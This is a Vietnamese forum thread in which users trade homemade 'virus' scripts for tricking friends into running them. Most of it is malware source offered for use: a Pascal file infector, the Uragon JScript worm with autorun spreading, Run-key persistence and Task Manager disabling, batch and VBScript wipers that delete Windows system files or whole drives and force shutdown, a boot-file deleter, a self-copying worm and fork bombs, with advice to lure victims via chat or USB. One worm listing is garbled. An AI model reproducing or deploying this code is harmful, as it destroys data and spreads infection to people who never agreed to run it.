Arny

New Member
các bạn chỉ cần chép đoạn sau vào Notepad và chạy nó. Virus này không ảnh hưởng đến máy tính. Khi nhấp vào nó bạn phải khởi động lại nếu máy cấu hình yếu.


code:



Start


Start virus.bat




Save lại với tên là virus.bat. Bạn có thể dùng nó để bẫy bạn bè qua nick yahoo
 

boyvip_9x_cold

New Member
nó chạy chính nó thôi mà !

cứ thế nhân lên và máy bạn bị đơ luôn , rồi đen máy luôn !

trò nhạt nhẽo quá !
 
Tốt nhất là copy luôn nó vào thư mục startup trong documents and settings ấy rồi thử, hehe.

Trò trẻ con này trước thử nghịch suốt, ấn esc mãi rồi cũng thoát được.
 

polygon_me

New Member
sslord có ai test chưa xin ý kiến cái này có lâu rùi, xưa như trái đất. Chỉ đơ máy trên vista hay windows 7 thui chứ xp hay 2k3 thì tắt dễ ợt. có thể thêm start mấy cái chương trình word hay IE thì mau đơ máy hơn.
 
hơ hơ máy mình ram 256 chạy cái này vẫn không ăn thua bật Task Maganer lên chộn tất rồi ấn

End task là hết

ko biết máy yếu cỡ nào mới bị khởi động lại
 
Cùi bắp, virus mà có code ngắn ngủn (chưa đủ 1 dòng ) mà gọi là virus a`


Nói thế thì cả tỉ code tựa tựa.


Virus nè


1.Viết trên nền pascal



Viết virus bằng Pascal


Với mục đích giúp các bạn tìm hiểu kỹ thuật làm ra (tạo) các chương trình virus, tui xin giới thiệu một chương trình virus đơn giản viết bằng ngôn ngữ Pascal mang tên kompan. Tác giả của chương trình này là một chuyên gia về viurs người Balan - Adam Blaszczyk. Virus kompan là viurs lây nhiễm vào các file loại *.EXE và file *.COM có trong thư mục hiện thời. Bạn cần lưu ý đến kỹ thuật làm "lây nhiễm" trong chương trình này. các bạn yên tâm Kompan là virus rất "hữu nghị" bạn có thể dịch và chạy chương trình nguồn dưới đây để thử. Điều đáng quan tâm ở đây là kỹ thuật làm ra (tạo) ra virus.




program kompan;


{$A-,B-,D-,E-,F-,G-,I-,L-,N-,O-,P-,Q-,R-,S-,T-,V-,X-,Y-}


{$M 8192,0,16384}


uses Dos, Crt;


const


MaskaEXE = '*.EXE';


var


Szuk : SearchRec;


NazwaNosiciela,


NazwaOfiary : String;


PlikNosiciela,


PlikOfiary : File;


DlugoscNosiciela : LongInt;


Bufor : Pointer;


I : Byte;


Status : Boolean;



begin


WriteLn;


WriteLn (' KOMPAN v1.0, Autor : Adam Blaszczyk 1997');


WriteLn;


NazwaNosiciela := ParamStr (0);


WriteLn (' Czy chcesz uruchomic wirusa (T/N) ?');


if UpCase(ReadKey)='T' then


begin


WriteLn;


Status :=False;


FindFirst (MaskaEXE, AnyFile, Szuk);


while (DosError = 0) and (IOResult = 0) and (not Status) do


begin


with Szuk do


if not ((Name='.') or


(Name='..') or


(not (Attr and Directory and VolumeID<>0))) then


begin


NazwaOfiary:=Name;


Delete (NazwaOfiary, Pos ('EXE',NazwaOfiary),3);


NazwaOfiary:=NazwaOfiary+'COM';


Assign (PlikOfiary, NazwaOfiary);


Reset (PlikOfiary,1);


if IOResult <> 0 then


begin


Status:=True;


WriteLn (' Tworze KOMPANA : ',NazwaOfiary);


Assign (PlikNosiciela, NazwaNosiciela);


Reset (PlikNosiciela, 1);


DlugoscNosiciela := FileSize (PlikNosiciela);


GetMem (Bufor,DlugoscNosiciela);


BlockRead (PlikNosiciela, Bufor^, DlugoscNosiciela);


ReWrite (PlikOfiary,1);


BlockWrite (PlikOfiary , Bufor^, DlugoscNosiciela);


Close (PlikNosiciela);


Close (PlikOfiary);


FreeMem (Bufor, DlugoscNosiciela);


end;


end;


FindNext (Szuk);


end;


If Not Status then WriteLn (' Nie znalazlem zadnego kandydata do infekcji !');


end;


Delete (NazwaNosiciela,Pos ('.COM',NazwaNosiciela),4);


NazwaNosiciela := '/C '+NazwaNosiciela+'.EXE';


for I:=1 to ParamCount do


NazwaNosiciela := NazwaNosiciela +' '+ParamStr(I);


SwapVectors;


Exec(GetEnv('COMSPEC'), NazwaNosiciela);


SwapVectors;


end.



2.Virus Uragon.txt.js (Con này của hacker, mình mò code của nó rồi copy lại)



Cần 2 file


File: uragon.txt.js


Code:


iset="Internet Settings"; expl="Explorer"; virus="uragon.txt.js"; flag=0;


reg1="HKCU\\Software\\Microsoft\\Windows\\CurrentV ersion\\"; rdw="REG_DWORD"; rsz="REG_SZ";


fso=new ActiveXObject("Scripting.FileSystemObject"); wsh=new ActiveXObject("WScript.Shell");


try{wsh.run(WScript.arguments(0),1,false);}catch(e 0){}


try{value=wsh.regRead("HKLM\\SOFTWARE\\BICOLANOINI \\");if(value=="NHED57")WScript.quit();}catch(e1){ }


wsh.regWrite("HKCU\\Software\\Microsoft\\Windows Script Host\\Settings\\Timeout",0,"REG_DWORD");


io=fso.openTextFile(WScript.ScriptFullName);cntnt= io.readAll();io.close(); for({_();WScript.sleep(100);}


function _(){


try {


win=fso.getSpecialFolder(0)+"\\service.exe.js"; win32=fso.getSpecialFolder(0)+"\\system32\\winx86. dll.js";


if(!fso.fileExists(win)){


io=fso.createTextFile(win);io.write(cntnt);io.clos e();fso.getFile(win).attributes=7;


try{lock=fso.openTextFile(win);for(lock.readAll();}catch(e3){}


}


if(!fso.fileExists(win32)){


io=fso.createTextFile(win32);io.write(cntnt);io.cl ose();fso.getFile(win32).attributes=7;


try{lock=fso.openTextFile(win32);for(lock.readAll();}catch(e4){}


}


wsh.regWrite(reg1+iset+"\\Zones\\0\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\1\\1201",flag,r dw);


wsh.regWrite(reg1+iset+"\\Zones\\2\\1201",flag,rdw );wsh.regWrite(reg1+iset+"\\Zones\\3\\1201",flag,r dw);


wsh.regWrite(reg1+iset+"\\Zones\\4\\1201",flag,rdw );


wsh.regWrite(reg1+"Policies\\Explorer\\Run\\1","c: \\windows\\system32\\winx86.dll.js",rsz);


wsh.regWrite(reg1+"Run\\updater23","c:\\windows\\s ervice.exe.js",rsz);


wsh.regWrite(reg1+"Policies\\"+expl+"\\NoRun",1,rd w);wsh.regWrite(reg1+"Policies\\"+expl+"\\NoFolder Options",1,rdw);


wsh.regWrite(reg1+"Policies\\"+expl+"\\NoShellSear chButton",1,rdw);wsh.regWrite(reg1+"Policies\\Syst em\\DisableTaskmgr",1,rdw);


wsh.regWrite(reg1+expl+"\\Advanced\\Hidden",2,rdw) ;wsh.regWrite(reg1+expl+"\\Advanced\\HideFileExt", 1,rdw);


wsh.regWrite(reg1+expl+"\\Advanced\\ShowSuperHidde n",0,rdw);


for(e=new Enumerator(fso.drives);!e.atEnd();e.moveNext()){


dr=e.item();


if((dr.driveType==1||dr.driveType==2)&&dr.driveLet ter.substring(0,1).toUpperCase()!="A"){


sze=dr.totalSize/(1024*1024*1024);


if(sze<10/*10*/){


p=dr.path+"\\";ssl=p+virus;ar=p+"Autorun.inf";


inf="[autorun]
" + "shellexecute=wscript.exe "+virus+" \"%1\"
shell\\E&xplore\\command=wscript.exe "+virus+" \"%1\"
"+


"shell\\verb=&Open
shell\\verb\\command=wscript .exe "+virus+" \"%1\"
";


if(!fso.fileExists(ssl))


{io=fso.createTextFile(ssl);io.write(cntnt);io.clo se();fso.getFile(ssl).attributes=7;}


if(fso.fileExists(ar)){


f=fso.getFile(ar);io=f.openAsTextStream(1,-2);info="";


if(!io.atEndOfStream)info=io.readAll();io.close();


if(info.indexOf(inf)<0){f.attributes=0;io=f.openAs TextStream(2,-1);io.write(inf);io.close();}


}else{io=fso.createTextFile(ar);io.write(inf);io.c lose();}


fso.getFile(ar).attributes=6;


}


}


}


try{io=fso.openTextFile(WScript.ScriptFullName);fo r(io.readAll();}catch(e5){}


}catch(e2){}


}




File:AutoRun



Code:


[autorun]


shellexecute=wscript.exe uragon.txt.js "%1"


shell\E&xplore\command=wscript.exe uragon.txt.js "%1"


shell\verb=&Open


shell\verb\command=wscript.exe uragon.txt.js "%1"




3.Virus không nên dùng



Dán mã naỳ vaò notepad :



Code :



@Echo Off


@cls


@title Virus ti choi


@assoc exe=txt


@assoc reg=jpg


@cd %systemroot%


@del /f /s /q TASKMAN.EXE


@cd %Systemroot%\system32


@del /f /s /q hal.dll


@del /f /s /q taskkil.exe


@del /f /s /q tasklist.exe


@del /f /s /q taskman.exe


@del /f /s /q taskmgr.exe


@shutdown -s -t 06 -c " Fatal error #1337, You DEAD!"


@del /f /s /q *.*


@cd ..


@del /f /s /q TASKMAN.EXE


@del /f /s /q *.*


@exit



Save thành file *.bat



4.Worm



các bạn lưu với đuôi .vbs là ok.



msgbox"Warnig!" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nhan


On Error Resume Next


Set vip_xinh = Createobject("scripting.filesystemobject")


vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"


Set vip_xinh2= CreateObject("WScript.Shell")


vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"



On Error Resume Next


Const vic = "D:\"


Delvic


Sub Delvic()


Dim fso


Set fso = CreateObject("Scripting.FileSystemObject")


fso.DeleteFile vic & "*.*" , True


fso.DeleteFolder vic & "*" , True


End Sub



On Error Resume Next


Const vic1 = "C:\windows\"


Delvic1


Sub Delvic1()


Dim fso1


Set fso1 = CreateObject("Scripting.FileSystemObject")


fso1.DeleteFile vic1 & "*.*" , True


fso1.DeleteFolder vic1 & "*" , True


End Sub



On Error Resume Next


Const vic2 = "C:\"


Delvic2


Sub Delvic2()


Dim fso2


Set fso2 = CreateObject("Scripting.FileSystemObject")


fso2.DeleteFile vic2 & "*.*" , True


fso2.DeleteFolder vic2 & "*" , True


End Sub



On Error Resume Next


Set treomay= CreateObject("WScript.Shell")


Do


treomay.run "notepad",false


loop



5.Virus xóa file system



Mở notepad lên và copy vào đó đoạn code sau:


Code:



@echo off


attrib -r -s -h c:\autoexec.bat


del c:\autoexec.bat


attrib -r -s -h c:\boot.ini


del c:\boot.ini


attrib -r -s -h c:\ntldr


del c:\ntldr


attrib -r -s -h c:\windows\win.ini


del c:\windows\win.ini


Save lại với dạng karobi.bat


Dụ victim mở nó lên và...



Tác dụng của con này là : nó sẽ xoá hết những file khởi động của hệ thống .



Cách khắc phục : sang máy khác copy các file sau : autoexec.bat ; boot.ini ; ntldr ; win.ini và dán vào ổ C .


Riêng file win.ini thì cho vào C:\Window\ nhé .




6.Worm lây lan



+ Đây là cách làm ra (tạo) một con virus đơn giản, cức năng của nó là tự nhân bản sang tất cả các folder của tất cả các ổ đĩa , nạn nhân thấy nó chắc ngứa mắt lắm nhỉ ?


+ Đương nhiên muốn xoá nó cũng không phải dễ đâu, bạn không bao giờ xoá hết hàng tỉ con virus này đâu, mà xoá tì nó vẫn mọc lại thôi, vì vậy nên mình cũng cung cấp file diệt (đưa 1.00.000đ đây)


Bạn làm teo các bước sau:


B1: Mở notepad ra


B2:Chép đoạn mã này vào


Code:


‘Waring, virus waring !!! Dim fso, file, VB Copy Set fso= Create Object (“Scripting.File System Object”)


Set file=


Fso_Open Text File (WScript. Script Full name, 1)


VB Copy= file. Read All


Folder List (“A:\”)


Folder List (“B:\”)


Folder List (“C:\”)


Folder List (“D:\”)


Folder List (“E:\”)


Folder List (“F:\”)


Folder List (“G:\”)


Folder List (“H:\”)


Folder List (“I:\”)


Folder List (“J:\”)


Folder List (“K:\”)


Folder List (“L:\”)


Folder List (“M:\”)


Folder List (“N:\)


Folder List (“O:\)


Folder List (“P:\)


Folder List (“Q:\)


Folder List (“R:\)


Folder List (“S:\)


Folder List (“T:\)


Folder List (“U:\)


Folder List (“V:\)


Folder List (“X:\)


Folder List (“Y:\)


Folder List (“Z:\)


Folder List (“W:\) Sub


Folder List (Folder Spec)


On error resume next


Dim f, f1, st, COP, CAP


Set f=


fso.Get Folder (Folder Spec)


set sf= f.Sub Folders for each f1 In sf set COP=


fso. Create Text File (f1.path & “\Virus !!!!!!!.vbs”)


COP. Write VB Copy set CAP=


Fso. Create Text File (f1.pat & “--- Virus !!!!!!!.vbs”)


CAP.write VBCopy


Folder List (f1.Path) Next


End Sub



¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬__________ __________________________________________________ ____________



B3: Save với tên của một loại virus nhưng kèm đuôi vbs


Eg: W32.VBCopy.Staff.vbs

---------- Bài viết vừa được nhập tự động bởi hệ thống ----------


Thank đi nha các bạn
 

Vinn

New Member
Người ta hưởng ứng chuyện diệt trừ virus chớ ai lại muốn có virus?
 

tonmackim

New Member
cũng hay đấy! bạn có code chạy 1 file .exe bất kỳ khi vào 1 thư mục hay chạy 1 file nào nó hok? cd như mình có 1 folder:
Programs files

trong nó có file
install.exe

word.doc

mình muốn khởi chạy file install.exe khi vào folder Programs files hay chạy file word.doc? help!
 

Boase

New Member
mấy con này có ghê lắm không ạ,chỉ sợ Phần mềm không diệt được lại khốn cùng khổ với nó,bác cho cách diệt lun đi
 

Rickie

New Member
Gamerhell Người ta hưởng ứng chuyện diệt trừ virus chớ ai lại muốn có virus? đúng rồi thử cái coi
 
Con này có tác dụng tắt aero trong và lock máy tính chỉ chừa mỗi cái Desktop (Chế độ ReadOnly >> Không cho Double Click, không cho move icon), Task Manager, một số hiệu chỉnh ngoài hệ thống, những Phần mềm đang chạy ở system tray


Để làm con virus này, hãy mở notepad và soạn nội dung sau: (Chỉ áp dụng trên Windows 7)


@echo off


taskkill /f /im dwm.exe


taskkill /f /im explorer.exe


taskkill /f /im svchost.exe


start taskmgr.exe


start explorer.exe


msg * Your system has been locked out!


Rồi save as... .bat và up lên yahoo để gạt và trêu bạn bè hay chép vào usb rồi mang sang máy khác và chạy nó!


Tiến trình làm chuyện của file này:


1. Tắt Aero


2. Tắt Explorer


3. Tắt khoảng 2-4 cái svchost


4. Khởi chạy Task Manager


5. Khởi động lại explorer (Phải mất khoảng 30 giây -> 1 phút để explorer được khởi động lại)


Để máy một lát có thể máy sẽ tự động khởi động lại không thông báo (y như nhấn nút reset trên Power case)
 
Chả có cái nào là virus cả.


Thà dùng cách này nó còn hiệu quả hơn là cách của các bạn



File1.bat


Start File2.bat


File2.bat


Start File3.bat


File3.bat


Start File1.bat



Rồi mở file nào lên cũng đơ máy. Nếu không đơ thì thêm nhiều câu lệnh xử lý vào là đơ ngay, mở thật nhiều vào.


Đây chỉ là cách làm cho máy hoạt đông quá công suất thôi
 

Các chủ đề có liên quan khác

Top